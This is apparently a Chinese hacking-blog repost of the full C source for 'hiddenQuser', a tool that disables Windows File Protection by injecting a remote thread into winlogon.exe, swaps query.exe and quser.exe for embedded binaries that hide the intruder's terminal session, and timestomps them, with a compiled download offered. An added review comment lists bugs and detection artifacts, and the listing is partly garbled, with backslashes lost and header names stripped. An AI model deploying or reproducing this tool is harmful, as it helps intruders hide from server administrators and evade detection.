鬼仔:query user 这个命令大家都知道吧?这个程序的作用就是替换系统目录下的 Quser.exe 与 Query.exe,这样你登录终端后,管理员使用 query user 查看时看不到你已经登录。但要注意它只替换了这两个命令行工具,任何不经过它们的会话查看方式(例如任务管理器)仍然能看到你——也就是说在任务管理器中并没有隐藏。
来源:精灵's Blog
执行后替换系统目录下的 Quser.exe 与 Query.exe,登录过终端服务器的朋友都知道这两个工具是做什么的吧~
大家都知道,在 Windows 2000、Windows XP 及 2003 系统中有系统文件保护(WFP,Windows File Protection)功能,一旦被保护的系统文件被修改,系统就会用 dllcache 中的副本还原它,并弹出要求插入系统安装光盘的对话框。所以本工具采用了黑客之门的方法:向 winlogon.exe 注入一个远程线程,调用 sfc.dll(Windows 2000)或 sfc_os.dll(XP/2003)的 2 号序数导出函数,让系统文件保护暂时失效,然后执行替换操作。执行后自动替换系统目录下的这两个文件,包括 dllcache 下的对应副本,让系统文件保护也无法还原原来的文件。需要指出的是,程序只是把原文件重命名为 query1.exe / quser1.exe 留在原处,并把原 query.exe 的时间戳复制到新写入的文件上;对管理员来说,这两个残留文件以及向 winlogon.exe 创建远程线程的行为都是很明显的检测线索。
没什么技术含量,在任务管理器中隐藏还不会.
程序代码:
/*
 * hiddenQuser — replaces %SystemRoot%\system32\query.exe and quser.exe
 * (and their dllcache copies) with two executables embedded as resources,
 * so that "query user" no longer lists the operator's terminal session.
 *
 * Order of operations in main():
 *   1. read the timestamps of the real query.exe (reused later to timestomp
 *      every file this tool writes);
 *   2. enable SeDebugPrivilege and open winlogon.exe;
 *   3. disable Windows File Protection by running ordinal #2 of
 *      sfc.dll (Win2000) / sfc_os.dll (XP/2003) as a remote thread inside
 *      winlogon.exe (widely reported as the WFP watcher-thread terminator;
 *      not verifiable from this listing);
 *   4. rename the four originals to query1.exe / quser1.exe via cmd's
 *      "rename" — the renamed originals are left behind on disk;
 *   5. write the embedded replacements in their place.
 *
 * Review notes (security / correctness, all grounded in the code below):
 *   - The listing shows "/n", "/r/n" and "//" inside string literals where
 *     the source almost certainly had "\n", "\r\n" and "\\" — the
 *     backslashes appear to have been lost when the page was extracted.
 *     As written, the banners print a literal "/n" and the paths use
 *     forward slashes.
 *   - The header names after the first three #include directives were
 *     stripped as well; the code needs <windows.h>, <stdio.h> and
 *     <tlhelp32.h> (Toolhelp32) before it will build.
 *   - Several Win32 handles/results are used without being checked:
 *     the CreateFile handle in main(), OpenProcess, LoadLibrary (hSfc is
 *     left uninitialised when the major version is not 5), GetProcAddress
 *     (a NULL dwAddress is passed straight to CreateRemoteThread) and
 *     CreateRemoteThread itself. hProcess and hSfc are never released.
 *   - Paths are built with unbounded strcat() into MAX_PATH buffers and
 *     handed to system() unquoted.
 *   - GetProcessIDFromName() tests the snapshot against NULL although
 *     CreateToolhelp32Snapshot reports failure with INVALID_HANDLE_VALUE,
 *     returns FALSE (0) on one failure path and -1 on the other, and never
 *     closes the snapshot handle.
 *   - Defender-visible artifacts: query1.exe / quser1.exe in system32 and
 *     dllcache, a remote thread created in winlogon.exe, and four freshly
 *     written binaries whose timestamps match the original query.exe.
 */
#include
#include
#include
#include"resource.h"

/* Writes a custom resource (szResourceType/szResourceName of hModule, or of
 * the current module when hModule is NULL) to szFilePath with CREATE_NEW,
 * optionally marking the file hidden. Defined below. */
BOOL ExtractFile(LPCTSTR szResourceType,LPCTSTR szResourceName,LPCTSTR szFilePath,HMODULE hModule, /* = NULL */
                 BOOL bHidden ); /* = TRUE */
/* Case-insensitive lookup of a process ID by image name via Toolhelp32. */
DWORD GetProcessIDFromName(char * name);
/* Enables (bEnable != FALSE) or disables the named privilege in the current
 * process token. */
BOOL DebugPrivilege(const char *PName,BOOL bEnable);

/* Timestamps captured from the original query.exe in main() and stamped
 * onto every file written by ExtractFile(). */
FILETIME lpCreationTime;    // creation time of the original query.exe
FILETIME lpLastAccessTime;  // last-access time of the original query.exe
FILETIME lpLastWriteTime;   // last-write time of the original query.exe

/* Entry point. argc/argv are not used. Non-standard "void main". */
void main(int argc,char * argv[])
{
    char System[MAX_PATH] = {0};     // system directory, e.g. C:\WINDOWS\system32
    char System1[MAX_PATH] = {0};    // "rename <sys>\query.exe query1.exe"
    char System2[MAX_PATH] = {0};    // "rename <sys>\quser.exe quser1.exe"
    char System3[MAX_PATH] = {0};    // "rename <sys>\dllcache\query.exe query1.exe"
    char System4[MAX_PATH] = {0};    // "rename <sys>\dllcache\quser.exe quser1.exe"
    char Queryexe[MAX_PATH] = {0};   // <sys>\query.exe
    char Queryexe1[MAX_PATH] = {0};  // <sys>\dllcache\query.exe
    char Quserexe[MAX_PATH] = {0};   // <sys>\quser.exe
    char Quserexe1[MAX_PATH] = {0};  // <sys>\dllcache\quser.exe
    HANDLE hFile = INVALID_HANDLE_VALUE;

    printf("/n=========================================================================/n");
    printf("[F.S.T] hidden Other user info when execute query.exe & quser.exe/n");
    printf("Welcome to [F.S.T] Http://Www.Wrsky.com/n");
    printf("Code by Sprite/n");
    printf("=========================================================================/n");

    // Return value (0 on failure) is not checked; every strcat() below is
    // unbounded against MAX_PATH.
    GetSystemDirectory(System,MAX_PATH);
    strcat(Queryexe,System);
    strcat(Queryexe,"//query.exe");
    printf("%s/n",Queryexe);

    // Capture the original query.exe timestamps for later timestomping.
    // hFile is not tested against INVALID_HANDLE_VALUE before use.
    hFile = CreateFile(Queryexe, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL );
    GetFileTime(hFile, &lpCreationTime, &lpLastAccessTime, &lpLastWriteTime);
    CloseHandle(hFile);

    strcat(Quserexe,System);
    strcat(Quserexe,"//quser.exe");
    printf("%s/n",Quserexe);
    strcat(Queryexe1,System);
    strcat(Queryexe1,"//dllcache");
    strcat(Queryexe1,"//query.exe");
    printf("%s/n",Queryexe1);
    strcat(Quserexe1,System);
    strcat(Quserexe1,"//dllcache");
    strcat(Quserexe1,"//quser.exe");
    printf("%s/n",Quserexe1);

    // Build the four cmd.exe "rename" commands. The paths are not quoted,
    // so a system directory containing spaces would break them.
    strcat(System1,"rename ");
    strcat(System1,System);
    strcat(System1,"//query.exe ");
    strcat(System1,"query1.exe");
    strcat(System2,"rename ");
    strcat(System2,System);
    strcat(System2,"//quser.exe ");
    strcat(System2,"quser1.exe");
    strcat(System3,"rename ");
    strcat(System3,System);
    strcat(System3,"//dllcache");
    strcat(System3,"//query.exe ");
    strcat(System3,"query1.exe");
    strcat(System4,"rename ");
    strcat(System4,System);
    strcat(System4,"//dllcache");
    strcat(System4,"//quser.exe ");
    strcat(System4,"quser1.exe");
    printf("%s/n",System1);
    printf("%s/n",System2);
    printf("%s/n",System3);
    printf("%s/n",System4);

    // SeDebugPrivilege is needed to open winlogon.exe; the result is ignored.
    DebugPrivilege("SeDebugPrivilege",TRUE);
    /* Locate winlogon.exe by image name (Toolhelp32 snapshot). dwPid is 0 or
     * (DWORD)-1 on failure and is not validated before OpenProcess. */
    DWORD dwPid=GetProcessIDFromName("Winlogon.exe");
    printf("Winlogon 's Process ID is:%d/n",dwPid);
    // hProcess is neither checked nor closed.
    HANDLE hProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwPid);

    DWORD dwVersion;
    HMODULE hSfc;
    dwVersion = GetVersion();
    // Pick the WFP module by OS version: LOBYTE(LOWORD) is the major version,
    // HIBYTE(LOWORD) the minor. hSfc stays uninitialised on any other OS.
    if ((DWORD)(LOBYTE(LOWORD(dwVersion))) == 5)
    {// Windows 2000/XP/2003
        if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 0) //Windows 2000
            hSfc = LoadLibrary("sfc.dll");
        else if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 1) //Windows XP
            hSfc = LoadLibrary("sfc_os.dll");
        else if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 2) //Windows 2003
            hSfc = LoadLibrary("sfc_os.dll");
    }
    // Resolve export ordinal #2 of the WFP module. This works because the
    // module is loaded at the same base in winlogon.exe (no ASLR on these
    // systems), so the local address is valid in the remote process.
    // A NULL result is not checked.
    FARPROC dwAddress=GetProcAddress(hSfc,MAKEINTRESOURCE(2));
    DWORD dwThreadId;
    HANDLE hThread;
    // Run that export inside winlogon.exe and give it up to 2 s to finish;
    // the thread handle and the wait result are not checked.
    hThread =CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *) (void *))dwAddress,0,0,&dwThreadId);
    WaitForSingleObject(hThread,2000l);

    // Rename the dllcache copies before the system32 originals so WFP has
    // nothing to restore from. system() exit codes are ignored; if a rename
    // fails, the matching ExtractFile() below fails too (CREATE_NEW).
    system(System3);
    system(System1);
    system(System4);
    system(System2);

    // Drop the embedded replacements into all four locations.
    if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE1),Queryexe1,NULL,FALSE))
        printf("Extract %s Success!/n",Queryexe1);
    else
        printf("Extract %s Error!/n",Queryexe1);
    if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE1),Queryexe,NULL,FALSE))
        printf("Extract %s Success!/n",Queryexe);
    else
        printf("Extract %s Error!/n",Queryexe);
    if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE2),Quserexe1,NULL,FALSE))
        printf("Extract %s Success!/n",Quserexe1);
    else
        printf("Extract %s Error!/n",Quserexe1);
    if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE2),Quserexe,NULL,FALSE))
        printf("Extract %s Success!/n",Quserexe);
    else
        printf("Extract %s Error!/n",Quserexe);

    // SE_DEBUG_NAME is the same privilege enabled above by literal name.
    DebugPrivilege(SE_DEBUG_NAME,FALSE);
    CloseHandle(hThread);
}

/*
 * ExtractFile — write a custom resource out as a file.
 *
 * szResourceType / szResourceName: resource to extract (name may be a
 *     MAKEINTRESOURCE ordinal).
 * szFilePath: destination; opened with CREATE_NEW, so an existing file
 *     makes the call fail.
 * hModule: module holding the resource; NULL means the current executable.
 * bHidden: add FILE_ATTRIBUTE_HIDDEN to the new file.
 *
 * Returns TRUE on success, FALSE after printing the failing step. On
 * success the file's timestamps are overwritten with the globals captured
 * in main() (timestomping); SetFileTime's result is not checked.
 */
BOOL ExtractFile(LPCTSTR szResourceType,LPCTSTR szResourceName,LPCTSTR szFilePath,HMODULE hModule, /* = NULL */
                 BOOL bHidden ) /* = TRUE */
{
    // No module given: assume the resource lives in the current process image.
    HMODULE hCurProc = hModule;
    if ( NULL == hModule )
        hCurProc = GetModuleHandle(NULL);
    //ASSERT( hCurProc );

    // Locate the resource.
    HRSRC hResourceExeFile;
    hResourceExeFile = FindResource(hCurProc,szResourceName,szResourceType );
    if ( ! hResourceExeFile )
    {
        //TRACE(_T("findresource failed!!(%ld) "), GetLastError());
        printf("findresource failed!!(%ld) ", GetLastError());
        return FALSE;
    }

    // Size of the resource payload.
    DWORD dwSize = SizeofResource( (HMODULE)hCurProc, hResourceExeFile );
    if ( 0 == dwSize )
    {
        //TRACE(_T("can not get the resource size"));
        printf("can not get the resource size");
        return FALSE;
    }

    // Map the resource into memory.
    HGLOBAL hGlobalMem = LoadResource(hCurProc, hResourceExeFile );
    if ( NULL == hGlobalMem )
    {
        //TRACE(_T("LoadResource failed! %ld"), GetLastError());
        printf("LoadResource failed! %ld", GetLastError());
        return FALSE;
    }

    // Pointer to the payload bytes; a NULL result is not checked.
    LPVOID lpExe = LockResource( hGlobalMem );
    //ASSERT( lpExe );
    /* Earlier revision deleted an existing target first; now disabled, so the
     * caller must have moved the original out of the way beforehand:
     * if (!DeleteFile(szFilePath)) { printf("delete failed"); return false; } */

    // Optional hidden attribute.
    DWORD dwAttrib = FILE_ATTRIBUTE_NORMAL;
    if ( bHidden )
        dwAttrib |= FILE_ATTRIBUTE_HIDDEN;

    // Create the destination (fails if it already exists) and write the payload.
    HANDLE hFile = INVALID_HANDLE_VALUE;
    hFile = CreateFile(szFilePath, GENERIC_WRITE, 0, NULL, CREATE_NEW, dwAttrib, NULL );
    if ( INVALID_HANDLE_VALUE == hFile )
    {
        //TRACE("can not open the target file (%ld) ", GetLastError());
        printf("can not open the target file (%ld) ", GetLastError());
        return FALSE;
    }
    DWORD dwWritten;
    // dwWritten is not compared with dwSize, so a short write is not detected.
    if ( ! WriteFile( hFile, lpExe, dwSize, &dwWritten, NULL ) )
    {
        //TRACE(_T("can not write the target file %ld"), GetLastError());
        printf("can not write the target file %ld", GetLastError());
        CloseHandle( hFile );
        return FALSE;
    }

    // Timestomp: copy the original query.exe times captured in main().
    SetFileTime(hFile, &lpCreationTime, &lpLastAccessTime, &lpLastWriteTime);
    CloseHandle( hFile );
    return TRUE;
}

/*
 * DebugPrivilege — enable or disable a named privilege on the current
 * process token.
 *
 * PName: privilege name, e.g. "SeDebugPrivilege" / SE_DEBUG_NAME.
 * bEnable: TRUE to set SE_PRIVILEGE_ENABLED, FALSE to clear it.
 *
 * Returns FALSE if the token cannot be opened or if GetLastError() is not
 * ERROR_SUCCESS after AdjustTokenPrivileges (which covers
 * ERROR_NOT_ALL_ASSIGNED when the privilege is not held). The return values
 * of LookupPrivilegeValue and AdjustTokenPrivileges themselves are ignored.
 */
BOOL DebugPrivilege(const char *PName,BOOL bEnable)
{
    BOOL bResult = TRUE;
    HANDLE hToken;
    TOKEN_PRIVILEGES TokenPrivileges;
    if(OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,&hToken) == 0)
    {
        printf("Fail To OpenProcess /r/n");
        bResult = FALSE;
        return bResult;
    }
    TokenPrivileges.PrivilegeCount = 1;
    TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
    // If the lookup fails, Luid is left uninitialised and still passed on.
    LookupPrivilegeValue(NULL,PName,&TokenPrivileges.Privileges[0].Luid);
    AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
    if(GetLastError() != ERROR_SUCCESS)
    {
        printf("Fail To AddPrivilege /r/n");
        bResult = FALSE;
    }
    CloseHandle(hToken);
    return bResult;
}

/*
 * GetProcessIDFromName — find a process ID by image file name.
 *
 * name: image name compared case-insensitively against szExeFile.
 *
 * Returns the first matching PID; FALSE (0) if the snapshot cannot be taken
 * (note: CreateToolhelp32Snapshot reports failure with INVALID_HANDLE_VALUE,
 * not NULL, so that branch is never taken); (DWORD)-1 if no process matches.
 * The snapshot handle is never closed on any path.
 */
DWORD GetProcessIDFromName(char * name)
{
    HANDLE snapshot ;
    PROCESSENTRY32 processinfo ;
    processinfo.dwSize = sizeof (processinfo) ;
    snapshot = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0) ;
    if (snapshot == NULL)
        return FALSE;
    BOOL status = Process32First (snapshot, &processinfo) ;
    while (status)
    {
        if(stricmp(name,processinfo.szExeFile)==0)
            return processinfo.th32ProcessID;
        status = Process32Next (snapshot, &processinfo);
    }
    return -1;
}
编译好的程序下载:
hiddenQuser.rar
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。